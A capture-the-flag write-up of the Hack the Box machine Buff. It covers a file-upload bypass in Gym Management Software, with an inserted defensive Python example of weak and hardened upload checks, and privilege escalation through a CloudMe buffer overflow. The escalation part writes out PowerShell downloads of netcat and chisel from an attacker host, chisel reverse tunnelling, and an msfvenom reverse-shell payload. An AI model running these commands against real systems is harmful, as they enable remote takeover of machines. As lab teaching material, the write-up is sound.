Hack the Box: Buff
Buff was an easy machine on Hack the Box. Here's my take on solving the challenge.

TL;DR: There's a Gym Management Software instance running on HTTP port 8080. It's vulnerable to an unauthenticated PHP file upload and therefore RCE. Locally there's a CloudMe version running with a known buffer overflow vulnerability which can be exploited to escalate privileges.
Recon
The Nmap scan showed only port 8080 open, with an HTTP server:

Main page:

Contact.php reveals the underlying software:

User
There's a CVE for Gym Management Software 1.0. It exploits the possibility of bypassing the file type filter by setting the proper magic bytes and content type to upload a webshell:
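The filter bypass above works because the upload handler trusts two things the client fully controls: the Content-Type header and the first few bytes of the file. The following Python example is added here to illustrate why that check fails and what a server-side check should look like instead; it is not code from the original post or from the Gym Management Software, and the sample uploads and the exact checks are constructed for illustration.

```python
import os
import secrets

# Constructed sample uploads (filename, client Content-Type, body), not from the post:
# a genuine PNG, a PHP-looking body wearing a GIF header, and a double-extension name.
SAMPLE_UPLOADS = {
    "real_png": ("photo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    "disguised_php": ("shell.php", "image/gif",
                      b"GIF89a" + b"<?php /* constructed placeholder, not a webshell */ ?>"),
    "double_ext": ("shell.php.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"x" * 8),
}

# Magic-byte signatures for the image types the application claims to accept.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\xff\xd8\xff": "jpg",
}
ALLOWED_EXT = {"png", "gif", "jpg", "jpeg"}


def sniff_type(data: bytes):
    """Return the image type implied by the leading bytes, or None."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def weak_check(filename: str, content_type: str, data: bytes) -> bool:
    """Model of the flawed check: Content-Type and magic bytes only, filename ignored.
    Both inputs are attacker-controlled, so prepending a GIF header is enough."""
    return content_type.startswith("image/") and sniff_type(data) is not None


def hardened_check(filename: str, content_type: str, data: bytes) -> bool:
    """Ignore the client's Content-Type entirely. Require exactly one extension,
    taken from an allowlist, and require the sniffed type to agree with it."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2:          # rejects "shell.php.png" style double extensions
        return False
    ext = parts[1]
    if ext not in ALLOWED_EXT:   # rejects ".php" and anything the web server may execute
        return False
    kind = sniff_type(data)
    if kind is None:
        return False
    if ext == "jpeg":
        ext = "jpg"
    return kind == ext


def safe_store_name(filename: str) -> str:
    """Server-chosen storage name: random token plus the validated extension, so the
    client never picks the on-disk name. Store it outside the document root."""
    ext = os.path.basename(filename).lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"


def evaluate(samples=SAMPLE_UPLOADS):
    """Run both checks over the samples; returns {name: (weak_result, hardened_result)}."""
    return {name: (weak_check(*args), hardened_check(*args)) for name, args in samples.items()}


if __name__ == "__main__":
    for name, (weak, hard) in evaluate().items():
        print(f"{name:14s} weak={weak!s:5s} hardened={hard}")
```

Running it shows the disguised PHP body passing the weak check and failing the hardened one, while the genuine PNG passes both. The extension allowlist plus server-chosen filename is what actually prevents the web server from ever executing an uploaded file; magic bytes alone only prove the attacker knows six characters of a GIF header.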
Running the script will create a webshell:

The webshell can be used to get the user flag:

Privilege escalation
There’s an interesting port open on localhost:

There's also a CloudMe process running:
# tasklist
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 8 K
System 4 0 140 K
-- snip --
CloudMe.exe 6640 0 37,704 K
-- snip --
Shaun's downloads reveal the program version:

There's a CVE with a buffer overflow for this version. It's listening on the local port 8888, so I need chisel to forward it. The needed files can be downloaded over HTTP from my Kali box using PowerShell:
# powershell -nop -c "Invoke-WebRequest -Uri http://10.10.14.20/nc.exe -OutFile C:\xampp\htdocs\gym\upload\nc.exe -Verbose"
# powershell -nop -command "iwr 'http://10.10.14.20/chisel.exe' -OutFile 'C:\xampp\htdocs\gym\upload\chisel.exe'"
To get Chisel to work I need to run a server on Kali:
./chisel_1.6.0_linux_386 server -p 4445 -reverse
And the client on the victim:
chisel.exe client 10.10.14.20:4445 R:8888:127.0.0.1:8888
I also need to generate a binary payload that runs the downloaded netcat and returns a reverse shell:
msfvenom -a x86 -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.20 443 -e cmd.exe' -b '\x00\x0a\x0d' -f python
The generated payload must be pasted into the exploit script:
Now running the script should return an admin reverse shell:
